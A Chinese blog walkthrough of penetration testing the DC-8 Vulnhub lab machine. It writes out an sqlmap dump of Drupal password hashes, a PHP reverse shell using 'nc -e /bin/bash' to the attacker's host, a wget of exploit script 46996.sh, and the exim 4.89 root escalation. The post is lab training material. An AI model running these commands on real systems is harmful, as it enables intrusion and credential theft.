DC-8渗透

最新推荐文章于 2024-07-25 10:39:15 发布
最新推荐文章于 2024-07-25 10:39:15 发布
阅读量782 收藏
点赞数 1
文章标签: 安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q90375412/article/details/127351747
版权

目录

信息收集

1.访问首页面发现三个页面的url由数字控制

2.在http://192.168.1.117/node/3页面发现一个用户admin的邮件发送页面

3.网站CMS

4.端口探测 22、80

5.目录扫描

渗透过程

1.sqlmap爆破发现存在注入点,尝试注入。

2.账号密码:john/turtle 登录成功

3.drupal php模板漏洞利用

提权

查看那些命令有root权限

查看exim4版本,在msfconsole搜索漏洞

总结:

信息收集

靶机IP:192.168.1.117

1.访问首页面发现三个页面的url由数字控制

http://192.168.1.117/?nid=2

bp爆破发现一个sql语句,一个路径.

  • SELECT title FROM node WHERE nid = 10

  • /var/www/html/sites/all/modules/mypages/mypages.module

2.在http://192.168.1.117/node/3页面发现一个用户admin的邮件发送页面

3.网站CMS

 

4.端口探测 22、80

nmap -T4 -A -v 192.168.1.117

5.目录扫描

http://192.168.1.117/user/login/ 登录界面
http://192.168.1.117/xmlrpc.php 
http://192.168.1.117/robots.txt      
​

访问xmlepc.php 构造请求包查看允许的方法。

 

请求包:

GET /xmlrpc.php HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
Content-Length: 91
​
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

返回包:发现没有可利用的方法。

 

访问robots.txt

 

渗透过程

1.sqlmap爆破发现存在注入点,尝试注入。

http://192.168.1.117/?nid=1

payload:

数据库:d7db 数据表:users 列:name、pass

sqlmap -u http://192.168.1.117/?nid=1 --cookie="has_js:"1"" --batch -D d7db -T users -C "name,pass" --dump
​
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

 

john爆破

 

2.账号密码:john/turtle 登录成功

 

3.drupal php模板漏洞利用

Add content——Webfrom——Find contert——WebForm——Form setting

 

写入php反弹shell

<?php system("nc -e /bin/bash 192.168.1.110 3333"); ?>

 

发送邮件你kali监听

nc -lvvp 3333

 

提权

查看那些命令有root权限

find / -perm -u=s -type f 2>/dev/null

 

发现exim4

查看exim4版本,在msfconsole搜索漏洞

exim4 --version
exim version 4.89

将46996.sh复制到kali的网站根目录下(/var/www/html)

在靶机上的/var/tmp目录执行:因为此目录有写的权限(可ls -l查看权限)

wget http://kaliIP/46996.sh

然后赋权:chmod 777 46996.sh

在46996.sh,里面发现两个执行sh脚本命令:

 

经尝试./46996.sh -m netcat 成功提权。

 

总结:

漏洞利用点,SQL注入、drupal php漏洞模板。

在DC8中加强了我对sqlmap、john、searchsploit工具的使用。

利用有root权限的命令进行提权exim。

翻斗花园大图图
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-8靶机渗透
whylon的博客
07-26 431
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
入侵靶机DC-8
干铮的博客
10-15 2008
DC-8 1.主机发现 使用Nmap进行ping扫描,根据已知mac地址获取ip地址。 Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0049s latency). MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC8靶场渗透流程(超详细)
m0_64583632的博客
04-12 596
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2100
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-8靶机教程
qq_40863723的博客
02-17 1667
多喝热水:http://hackergu.com/ 一、主机发现 ​ 使用netdiscover,发现主机IP为192.168.203.134。 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST ...
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 783
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 1972
MySQL基线检查,基线配置,安全加固
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
2401_86131344的博客
07-23 371
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
后台管理系统登录安全和权限要求
最新发布
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 596
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
防火墙--内容安全
banliyaoguai的博客
07-20 1238
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
气膜建筑的逃生通道设计与安全保障—轻空间
Skansi的博客
07-25 294
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值